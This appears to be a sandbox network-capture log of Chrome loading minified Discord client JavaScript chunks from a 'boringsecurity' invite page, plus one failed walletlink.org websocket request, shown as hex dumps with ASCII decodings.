                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 34 37 31 37 30 36 22 29 2c 66 3d 6e 28 22 38 34 33 30 33 35 22 29 2c 67 3d 6e 28 22 34 39 31 31 31 22 29 2c 63 3d 6e 28 22 37 32 34 32 31 30 22 29 3b 6c 65 74 20 5f 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 70 28 65 29 7b 5f 5b 65 5d 3d 6e 75 6c 6c 7d 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 45 28 65 29 7b 6c 65 74 7b 67 75 69 6c 64 49 64 3a 74 2c 72 65 74 75 72 6e 43 68 61 6e 6e 65 6c 49 64 3a 6e 2c 69 73 50 72 65 76 69 65 77 3a 61 3d 21 31 7d 3d 65 3b 28 30 2c 69 2e 63 6c 6f 73 65 41 6c 6c 4d 6f 64 61 6c 73 29 28 29 2c 6c 28 6e 75 6c 6c 3d 3d 5f 5b 74 5d 2c 22 73 68 6f 75 6c 64 20 6e 6f 74 20 64 6f 75 62 6c 65 2d 6a 6f 69 6e 20 67 75 69 6c 64 73 22 29 3b 6c 65 74 20 72 3d 61 77 61 69 74 20 28 30 2c 64 2e 77 61 69 74 46 6f 72 47 75 69 6c 64 29 28 74 29
                                                                          Data Ascii: 471706"),f=n("843035"),g=n("49111"),c=n("724210");let _={};function p(e){_[e]=null}async function E(e){let{guildId:t,returnChannelId:n,isPreview:a=!1}=e;(0,i.closeAllModals)(),l(null==_[t],"should not double-join guilds");let r=await (0,d.waitForGuild)(t)
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 6e 20 72 7d 2c 75 73 65 46 6c 61 74 74 65 6e 65 64 43 68 61 6e 6e 65 6c 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 6e 28 22 32 32 32 30 30 37 22 29 2c 6e 28 22 34 32 34 39 37 33 22 29 3b 76 61 72 20 61 3d 6e 28 22 39 31 37 33 35 31 22 29 2c 6c 3d 6e 2e 6e 28 61 29 2c 69 3d 6e 28 22 34 34 36 36 37 34 22 29 2c 64 3d 6e 28 22 34 32 32 30 33 22 29 2c 73 3d 6e 28 22 34 34 39 30 30 38 22 29 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 2c 6e 29 7b 6c 65 74 20 61 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 33 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 33 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 33 5d 2c 69 3d 6c 28 64 2e 64 65 66 61 75 6c 74 2e 67 65 74 4d 75 74 61 62 6c 65 47 75 69 6c 64 43 68 61 6e 6e
                                                                          Data Ascii: n r},useFlattenedChannels:function(){return o}}),n("222007"),n("424973");var a=n("917351"),l=n.n(a),i=n("446674"),d=n("42203"),s=n("449008");function r(e,t,n){let a=arguments.length>3&&void 0!==arguments[3]&&arguments[3],i=l(d.default.getMutableGuildChann
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 28 29 7b 72 65 74 75 72 6e 20 76 7d 7d 29 2c 6e 28 22 32 32 32 30 30 37 22 29 3b 76 61 72 20 61 3d 6e 28 22 39 31 37 33 35 31 22 29 2c 6c 3d 6e 28 22 31 35 31 34 32 36 22 29 2c 69 3d 6e 28 22 39 31 33 31 34 34 22 29 2c 64 3d 6e 28 22 35 31 39 37 30 35 22 29 2c 73 3d 6e 28 22 37 31 36 32 34 31 22 29 2c 72 3d 6e 28 22 34 37 39 37 35 36 22 29 2c 6f 3d 6e 28 22 33 38 36 35 34 22 29 2c 75 3d 6e 28 22 36 37 39 34 32 38 22 29 2c 66 3d 6e 28 22 38 37 32 31 37 33 22 29 2c 67 3d 6e 28 22 34 32 32 30 33 22 29 2c 63 3d 6e 28 22 32 38 32 31 30 39 22 29 2c 5f 3d 6e 28 22 35 39 39 31 31 30 22 29 2c 70 3d 6e 28 22 35 36 38 37 33 34 22 29 2c 45 3d 6e 28 22 33 34 36 37 36 22 29 2c 4e 3d 6e 28 22 34 39 31 31 31 22 29 2c 68 3d 6e 28 22 33 39 37 33 33 36 22 29 3b 66 75 6e 63
                                                                          Data Ascii: (){return v}}),n("222007");var a=n("917351"),l=n("151426"),i=n("913144"),d=n("519705"),s=n("716241"),r=n("479756"),o=n("38654"),u=n("679428"),f=n("872173"),g=n("42203"),c=n("282109"),_=n("599110"),p=n("568734"),E=n("34676"),N=n("49111"),h=n("397336");func


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          311192.168.2.550047162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:17 UTC866OUTGET /assets/64612.26d2bf1afbde26a43a76.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=_6GQ8QtUHu8.oOBijCt_kR_eqXbr1NCSfOnBsOJXNW8-1702226717582-0-604800000
                                                                          2023-12-10 16:45:18 UTC963INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 35 36 39 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 31 63 38 65 62 65 32 31 63 37 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:18 GMTContent-Type: application/javascriptContent-Length: 15698Connection: closeCF-Ray: 8336f51c8ebe21c7-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:18 UTC406INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 36 34 36 31 32 22 5d 2c 7b 35 31 35 36 33 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 46 65 65 64 49 74 65 6d 49 6e 74 65 72 61 63 74 69 6f 6e 54 79 70 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 7d 2c 47 75 69 6c 64 46 65 65 64 53 65 63 74 69 6f 6e 54 79 70 65 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 2c 47 75 69 6c 64 46 65 65 64 52 65 6e 64 65 72 4d 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["64612"],{515631:function(e,t,n){"use strict";n.r(t),n.d(t,{FeedItemInteractionType:function(){return d},GuildFeedSectionTypes:function(){return i},GuildFeedRenderMode:function(){retur
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 30 30 37 22 29 3b 76 61 72 20 64 2c 69 2c 72 2c 6c 2c 75 2c 73 2c 61 2c 45 2c 6f 3d 6e 28 22 32 39 38 33 38 36 22 29 3b 28 75 3d 64 7c 7c 28 64 3d 7b 7d 29 29 2e 4d 45 53 53 41 47 45 5f 43 4c 49 43 4b 45 44 3d 22 6d 65 73 73 61 67 65 5f 63 6c 69 63 6b 65 64 22 2c 75 2e 4d 45 53 53 41 47 45 5f 43 48 41 4e 4e 45 4c 5f 43 4c 49 43 4b 45 44 3d 22 6d 65 73 73 61 67 65 5f 63 68 61 6e 6e 65 6c 5f 63 6c 69 63 6b 65 64 22 2c 75 2e 52 45 41 43 54 49 4f 4e 5f 41 44 44 45 44 3d 22 72 65 61 63 74 69 6f 6e 5f 61 64 64 65 64 22 2c 75 2e 52 45 41 43 54 49 4f 4e 5f 52 45 4d 4f 56 45 44 3d 22 72 65 61 63 74 69 6f 6e 5f 72 65 6d 6f 76 65 64 22 2c 75 2e 54 48 52 45 41 44 5f 45 4d 42 45 44 5f 43 4c 49 43 4b 45 44 3d 22 74 68 72 65 61 64 5f 65 6d 62 65 64 5f 63 6c 69 63 6b 65
                                                                          Data Ascii: 007");var d,i,r,l,u,s,a,E,o=n("298386");(u=d||(d={})).MESSAGE_CLICKED="message_clicked",u.MESSAGE_CHANNEL_CLICKED="message_channel_clicked",u.REACTION_ADDED="reaction_added",u.REACTION_REMOVED="reaction_removed",u.THREAD_EMBED_CLICKED="thread_embed_clicke
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 44 49 4e 47 5f 46 52 45 53 48 5f 46 45 45 44 3d 30 5d 3d 22 4c 4f 41 44 49 4e 47 5f 46 52 45 53 48 5f 46 45 45 44 22 2c 69 5b 69 2e 4c 4f 41 44 49 4e 47 5f 50 41 47 45 3d 31 5d 3d 22 4c 4f 41 44 49 4e 47 5f 50 41 47 45 22 2c 69 5b 69 2e 4e 4f 4e 45 3d 32 5d 3d 22 4e 4f 4e 45 22 3b 6c 65 74 20 53 3d 7b 6c 6f 61 64 69 6e 67 3a 32 2c 65 72 72 6f 72 3a 6e 75 6c 6c 7d 2c 54 3d 7b 6f 66 66 73 65 74 3a 6e 75 6c 6c 2c 68 61 73 4d 6f 72 65 49 74 65 6d 73 3a 6e 75 6c 6c 7d 2c 67 3d 7b 7d 2c 47 3d 7b 7d 2c 41 3d 7b 7d 2c 44 3d 7b 7d 2c 4d 3d 7b 7d 2c 76 3d 7b 7d 2c 70 3d 7b 7d 2c 79 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 68 28 65 29 7b 6c 65 74 20 74 3d 79 5b 65 5d 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 74 26 26 28 74 3d 6e 65 77 20 6c 2e 64 65 66 61 75 6c 74 28
                                                                          Data Ascii: DING_FRESH_FEED=0]="LOADING_FRESH_FEED",i[i.LOADING_PAGE=1]="LOADING_PAGE",i[i.NONE=2]="NONE";let S={loading:2,error:null},T={offset:null,hasMoreItems:null},g={},G={},A={},D={},M={},v={},p={},y={};function h(e){let t=y[e];return null==t&&(t=new l.default(
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 63 74 69 6f 6e 54 79 70 65 73 2e 41 4c 4c 29 3b 66 6f 72 28 6c 65 74 20 65 20 6f 66 20 64 29 69 66 28 28 30 2c 63 2e 67 65 74 41 6c 6c 4d 65 73 73 61 67 65 49 64 73 46 72 6f 6d 46 65 65 64 49 74 65 6d 29 28 65 29 2e 68 61 73 28 74 29 29 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 59 28 65 2c 74 29 7b 76 61 72 20 6e 2c 64 2c 69 3b 6c 65 74 20 72 3d 50 28 65 2c 74 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 72 26 26 28 6e 75 6c 6c 3d 3d 3d 28 64 3d 70 5b 72 5d 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 64 7c 7c 6e 75 6c 6c 3d 3d 3d 28 6e 3d 64 5b 65 5d 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 7c 7c 64 65 6c 65 74 65 20 6e 5b 74 5d 2c 6e 75 6c 6c 3d 3d 3d 28 69 3d 76 5b 65 5d 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 7c 7c 64 65 6c 65 74 65 20 69 5b 74 5d 2c
                                                                          Data Ascii: ctionTypes.ALL);for(let e of d)if((0,c.getAllMessageIdsFromFeedItem)(e).has(t))return e}function Y(e,t){var n,d,i;let r=P(e,t);return null!=r&&(null===(d=p[r])||void 0===d||null===(n=d[e])||void 0===n||delete n[t],null===(i=v[e])||void 0===i||delete i[t],
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 68 53 74 61 74 75 73 28 65 29 7b 76 61 72 20 74 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 3d 28 74 3d 47 5b 65 5d 29 26 26 76 6f 69 64 20 30 21 3d 3d 74 3f 74 3a 53 7d 67 65 74 46 65 61 74 75 72 65 64 49 74 65 6d 73 46 65 74 63 68 53 74 61 74 75 73 28 65 29 7b 76 61 72 20 74 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 3d 28 74 3d 44 5b 65 5d 29 26 26 76 6f 69 64 20 30 21 3d 3d 74 3f 74 3a 53 7d 67 65 74 50 61 67 69 6e 61 74 69 6f 6e 53 74 61 74 75 73 28 65 29 7b 76 61 72 20 74 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 3d 28 74 3d 41 5b 65 5d 29 26 26 76 6f 69 64 20 30 21 3d 3d 74 3f 74 3a 54 7d 67 65 74 49 73 49 74 65 6d 48 69 64 69 6e 67 28 65 2c 74 29 7b 76 61 72 20 6e 3b 72 65 74 75 72 6e 21 21 28 6e 75 6c 6c 3d 3d 3d 28 6e 3d 4e 5b 65 5d 29 7c 7c 76 6f
                                                                          Data Ascii: hStatus(e){var t;return null!==(t=G[e])&&void 0!==t?t:S}getFeaturedItemsFetchStatus(e){var t;return null!==(t=D[e])&&void 0!==t?t:S}getPaginationStatus(e){var t;return null!==(t=A[e])&&void 0!==t?t:T}getIsItemHiding(e,t){var n;return!!(null===(n=N[e])||vo
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 6c 74 73 2e 69 74 65 6d 73 29 7d 7d 3b 6c 65 74 20 61 3d 68 28 6c 29 2c 45 3d 61 2e 76 61 6c 75 65 73 28 29 2e 6c 65 6e 67 74 68 2c 63 3d 45 3b 66 6f 72 28 6c 65 74 20 65 20 6f 66 20 75 2e 72 65 73 75 6c 74 73 2e 69 74 65 6d 73 29 7b 6c 65 74 20 74 3d 28 30 2c 6f 2e 63 72 65 61 74 65 47 75 69 6c 64 46 65 65 64 49 74 65 6d 46 72 6f 6d 53 65 72 76 65 72 29 28 65 2c 63 29 3b 69 66 28 6e 75 6c 6c 21 3d 74 29 63 2b 3d 31 2c 6e 75 6c 6c 3d 3d 61 2e 67 65 74 28 74 2e 69 64 29 26 26 28 74 2e 66 65 61 74 75 72 65 64 26 26 55 5b 6c 5d 2e 61 64 64 28 74 2e 69 64 29 2c 56 28 6c 2c 74 29 2c 61 2e 73 65 74 28 74 2e 69 64 2c 74 29 29 7d 6c 65 74 20 5f 3d 6e 75 6c 6c 21 3d 3d 28 72 3d 6e 75 6c 6c 3d 3d 3d 28 64 3d 41 5b 6c 5d 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 64 3f 76
                                                                          Data Ascii: lts.items)}};let a=h(l),E=a.values().length,c=E;for(let e of u.results.items){let t=(0,o.createGuildFeedItemFromServer)(e,c);if(null!=t)c+=1,null==a.get(t.id)&&(t.featured&&U[l].add(t.id),V(l,t),a.set(t.id,t))}let _=null!==(r=null===(d=A[l])||void 0===d?v
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 65 74 20 73 3d 68 28 6c 29 2c 61 3d 6e 75 6c 6c 21 3d 3d 28 64 3d 73 2e 67 65 74 28 75 29 29 26 26 76 6f 69 64 20 30 21 3d 3d 64 3f 64 3a 28 30 2c 5f 2e 63 72 65 61 74 65 46 61 6b 65 47 75 69 6c 64 46 65 65 64 49 74 65 6d 29 28 69 29 3b 6e 75 6c 6c 21 3d 61 26 26 28 6e 75 6c 6c 21 3d 61 2e 6d 65 73 73 61 67 65 26 26 28 6e 75 6c 6c 3d 3d 3d 28 6e 3d 70 5b 6c 5d 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 75 6c 6c 3d 3d 3d 28 74 3d 6e 5b 61 2e 6d 65 73 73 61 67 65 2e 63 68 61 6e 6e 65 6c 5f 69 64 5d 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 5b 61 2e 6d 65 73 73 61 67 65 2e 69 64 5d 29 3d 3d 6e 75 6c 6c 26 26 6b 28 6c 2c 61 2e 6d 65 73 73 61 67 65 29 2c 73 2e 64 65 6c 65 74 65 28 61 2e 69 64 29 2c 61 2e 66 65 61
                                                                          Data Ascii: et s=h(l),a=null!==(d=s.get(u))&&void 0!==d?d:(0,_.createFakeGuildFeedItem)(i);null!=a&&(null!=a.message&&(null===(n=p[l])||void 0===n?void 0:null===(t=n[a.message.channel_id])||void 0===t?void 0:t[a.message.id])==null&&k(l,a.message),s.delete(a.id),a.fea
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 4d 45 53 53 41 47 45 5f 52 45 41 43 54 49 4f 4e 5f 41 44 44 3a 78 2c 4d 45 53 53 41 47 45 5f 52 45 41 43 54 49 4f 4e 5f 41 44 44 5f 4d 41 4e 59 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 7b 63 68 61 6e 6e 65 6c 49 64 3a 74 2c 6d 65 73 73 61 67 65 49 64 3a 6e 2c 72 65 61 63 74 69 6f 6e 73 3a 64 7d 3d 65 2c 69 3d 45 2e 64 65 66 61 75 6c 74 2e 67 65 74 49 64 28 29 3b 72 65 74 75 72 6e 20 62 28 74 2c 6e 2c 65 3d 3e 65 2e 61 64 64 52 65 61 63 74 69 6f 6e 42 61 74 63 68 28 64 2c 69 29 29 7d 2c 4d 45 53 53 41 47 45 5f 52 45 41 43 54 49 4f 4e 5f 52 45 4d 4f 56 45 3a 78 2c 4d 45 53 53 41 47 45 5f 52 45 41 43 54 49 4f 4e 5f 52 45 4d 4f 56 45 5f 41 4c 4c 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 7b 63 68 61 6e 6e 65 6c 49 64 3a 74 2c 6d 65 73 73 61 67 65
                                                                          Data Ascii: MESSAGE_REACTION_ADD:x,MESSAGE_REACTION_ADD_MANY:function(e){let{channelId:t,messageId:n,reactions:d}=e,i=E.default.getId();return b(t,n,e=>e.addReactionBatch(d,i))},MESSAGE_REACTION_REMOVE:x,MESSAGE_REACTION_REMOVE_ALL:function(e){let{channelId:t,message
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 69 6f 6e 20 46 28 65 2c 74 29 7b 76 61 72 20 6e 2c 64 2c 6c 2c 61 2c 6f 2c 63 2c 5f 3b 73 77 69 74 63 68 28 65 2e 74 79 70 65 29 7b 63 61 73 65 20 72 2e 47 75 69 6c 64 46 65 65 64 49 74 65 6d 54 79 70 65 73 2e 46 4f 52 55 4d 5f 50 4f 53 54 3a 7b 6c 65 74 20 69 3d 28 30 2c 75 2e 63 72 65 61 74 65 4d 65 73 73 61 67 65 52 65 63 6f 72 64 29 28 65 2e 6d 65 73 73 61 67 65 29 2c 6c 3d 28 30 2c 73 2e 63 72 65 61 74 65 43 68 61 6e 6e 65 6c 52 65 63 6f 72 64 46 72 6f 6d 53 65 72 76 65 72 29 28 65 2e 74 68 72 65 61 64 29 2c 61 3d 7b 74 79 70 65 3a 72 2e 47 75 69 6c 64 46 65 65 64 49 74 65 6d 54 79 70 65 73 2e 46 4f 52 55 4d 5f 50 4f 53 54 2c 69 64 3a 28 30 2c 45 2e 64 65 66 61 75 6c 74 29 28 65 29 2c 73 6f 72 74 49 6e 64 65 78 3a 74 2c 6d 65 73 73 61 67 65 3a 69 2c
                                                                          Data Ascii: ion F(e,t){var n,d,l,a,o,c,_;switch(e.type){case r.GuildFeedItemTypes.FORUM_POST:{let i=(0,u.createMessageRecord)(e.message),l=(0,s.createChannelRecordFromServer)(e.thread),a={type:r.GuildFeedItemTypes.FORUM_POST,id:(0,E.default)(e),sortIndex:t,message:i,


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          312192.168.2.550049104.18.37.84435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:18 UTC503OUTGET /rpc HTTP/1.1
                                                                          Host: www.walletlink.org
                                                                          Connection: Upgrade
                                                                          Pragma: no-cache
                                                                          Cache-Control: no-cache
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Upgrade: websocket
                                                                          Origin: https://boringsecurity.com
                                                                          Sec-WebSocket-Version: 13
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Sec-WebSocket-Key: AkcZ3OPZR2qFCx6KlgEwAA==
                                                                          Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                          2023-12-10 16:45:18 UTC358INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 48 65 61 64 65 72 73 3a 20 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 53 65 63 2d 57 65 62 73 6f 63 6b 65 74 2d 56 65 72 73 69 6f 6e 3a 20 31 33 0d 0a 58 2d 43 6f 6e 74 65 6e
                                                                          Data Ascii: HTTP/1.1 400 Bad RequestDate: Sun, 10 Dec 2023 16:45:18 GMTContent-Type: text/plain; charset=utf-8Content-Length: 12Connection: closeAccess-Control-Allow-Headers: AuthorizationAccess-Control-Allow-Origin: *Sec-Websocket-Version: 13X-Conten
                                                                          2023-12-10 16:45:18 UTC12INData Raw: 42 61 64 20 52 65 71 75 65 73 74 0a
                                                                          Data Ascii: Bad Request


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          313192.168.2.550050162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:18 UTC866OUTGET /assets/18409.cf59ec1aee18034022a9.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=R4LQ9eAOy65FjFKBoqbEAGdchuqmDzFj3MHXAoIITyo-1702226717665-0-604800000
                                                                          2023-12-10 16:45:18 UTC1121INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 39 35 34 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 31 65 32 63 66 64 38 64 61 36 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:18 GMTContent-Type: application/javascriptContent-Length: 9542Connection: closeCF-Ray: 8336f51e2cfd8da6-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.com
                                                                          2023-12-10 16:45:18 UTC248INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 31 38 34 30 39 22 5d 2c 7b 38 36 39 35 38 36 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 65 29 2c 6e 2e 64 28 65 2c 7b 42 6c 69 6e 64 49 44 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 7d 29 2c 6e 28 22 33 31 31 37 39 30 22 29 2c 6e 28 22 34 37 37 36 35 37 22 29 2c 6e 28 22 38 31 31 38 37 35 22 29 2c 6e 28 22 39 30 33 30 31 22 29 2c 6e 28 22 36 35 32 31 35 33 22 29 2c 6e 28 22 32 38 37 39 37 22 29 2c 6e 28 22 38 31 37 38 38 34 22 29 2c 6e 28 22 35
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["18409"],{869586:function(t,e,n){"use strict";n.r(e),n.d(e,{BlindID:function(){return r}}),n("311790"),n("477657"),n("811875"),n("90301"),n("652153"),n("28797"),n("817884"),n("5
